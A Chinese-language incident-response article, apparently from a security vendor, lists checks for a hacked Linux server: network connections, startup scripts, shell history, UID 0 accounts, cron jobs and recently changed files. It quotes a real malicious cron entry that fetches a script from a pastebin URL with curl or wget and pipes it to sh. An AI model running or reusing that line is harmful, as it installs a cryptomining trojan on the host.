很多客戶網(wǎng)站服務(wù)器被入侵,被攻擊,找到我們SINE安全公司尋求技術(shù)支持與幫助,有些網(wǎng)站被篡改,被跳轉(zhuǎn),首頁內(nèi)容被替換,服務(wù)器植入木馬后門,服務(wù)器卡頓,服務(wù)器異常網(wǎng)絡(luò)連接,有的客戶使用的是阿里云服務(wù)器,經(jīng)常被提醒服務(wù)器有挖礦程序,以及網(wǎng)站被上傳webshell的安全提醒,包括騰訊云提示服務(wù)器有木馬文件,客戶網(wǎng)站被攻擊的第一時間,是需要立即處理的,降損失降到最低,讓網(wǎng)站恢復(fù)正常的訪問,由于每個客戶找到我們SINE安全都是比較著急的,安全的處理時間也需要盡快的處理,根據(jù)我們的處理經(jīng)驗,我們總結(jié)了一些服務(wù)器被攻擊,被黑的排查辦法,專門用來檢查服務(wù)器第一時間的安全問題,看發(fā)生在哪里,服務(wù)器是否被黑,是否被攻擊,那些被篡改等等。
如何排查服務(wù)器被攻擊?
首先我們會對當(dāng)前服務(wù)器的IP,以及IP的地址,linux服務(wù)器名稱,服務(wù)器的版本是centos,還是redhat,服務(wù)器的當(dāng)前時間,進(jìn)行收集并記錄到一個txt文檔里,接下來再執(zhí)行下一步,對當(dāng)前服務(wù)器的異常網(wǎng)絡(luò)連接以及異常的系統(tǒng)進(jìn)程檢查,主要是通過netstat -an以及-antp命令來檢查服務(wù)器存在哪些異常的IP連接。并對連接的IP,進(jìn)行歸屬地查詢,如果是國外的IP,直接記錄當(dāng)前進(jìn)程的PID值,并自動將PID的所有信息記錄,查詢PID所在的linux文件地址,緊接著檢查當(dāng)前占用CPU大于百分之30的進(jìn)程,并檢查該進(jìn)程所在的文件夾。
在我們處理客戶服務(wù)器被攻擊的時候發(fā)現(xiàn)很多服務(wù)器的命令被篡改,比如正常的PS查看進(jìn)程的,查詢目錄的 cd的命令都給篡改了,讓服務(wù)器無法正常使用命令,檢查服務(wù)器安全造成了困擾。對服務(wù)器的啟動項進(jìn)行檢查,有些服務(wù)器被植入木馬后門,即使重啟服務(wù)器也還是被攻擊,木馬會自動的啟動,檢查linux的init.d的文件夾里是否有多余的啟動文件,也可以檢查時間,來判斷啟動項是否有問題。
再一個要檢查的地方是服務(wù)器的歷史命令,history很多服務(wù)器被黑都會留下痕跡,比如SSH登錄服務(wù)器后,攻擊者對服務(wù)器進(jìn)行了操作,執(zhí)行了那些惡意命令都可以通過history查詢的到,有沒有使用wget命令下載木馬,或者執(zhí)行SH文件。檢查服務(wù)器的所有賬號,以及當(dāng)前使用并登錄的管理員賬戶,tty是本地用戶登錄,pst是遠(yuǎn)程連接的用戶登錄,來排查服務(wù)器是否被黑,被攻擊,也可以檢查login.defs文件的uid值,判斷uid的passwd來獲取最近新建的管理員賬戶。執(zhí)行cat etc/passwd命令檢查是否存在異常的用戶賬戶,包括特權(quán)賬戶,UID值為0.
最重要的是檢查服務(wù)器的定時任務(wù),前段時間某網(wǎng)站客戶中了挖礦病毒,一直占用CPU,查看了定時任務(wù)發(fā)現(xiàn)每15分鐘自動執(zhí)行下載命令,crontab -l */15 * * * * (curl -fsSL https://pastebin.com/raw/TS4NeUnd||wget -q-O- https://pastebin.com/raw/TS4NeUnd)|sh 代碼如上,自動下載并執(zhí)行SH木馬文件。定時任務(wù)刪都刪不掉,最后通過檢查系統(tǒng)文件查到了木馬,并終止進(jìn)程,強制刪除。有些服務(wù)器被黑后,請立即檢查2天里被修改的文件,可以通過find命令去檢查所有的文件,看是否有木馬后門文件,如果有可以確定服務(wù)器被黑了。
以上就是服務(wù)器被入侵攻擊的檢查辦法,通過我們SINE安全給出的檢查步驟,挨個去檢查,就會發(fā)現(xiàn)出問題,最重要的是要檢查日志,對這些日志要仔細(xì)的檢查,哪怕一個特征都會導(dǎo)致服務(wù)器陷入被黑,被攻擊的狀態(tài),也希望我們的分享能夠幫助到更多需要幫助的人,服務(wù)器安全了,帶來的也是整個互聯(lián)網(wǎng)的安全。
申請創(chuàng)業(yè)報道,分享創(chuàng)業(yè)好點子。點擊此處,共同探討創(chuàng)業(yè)新機遇!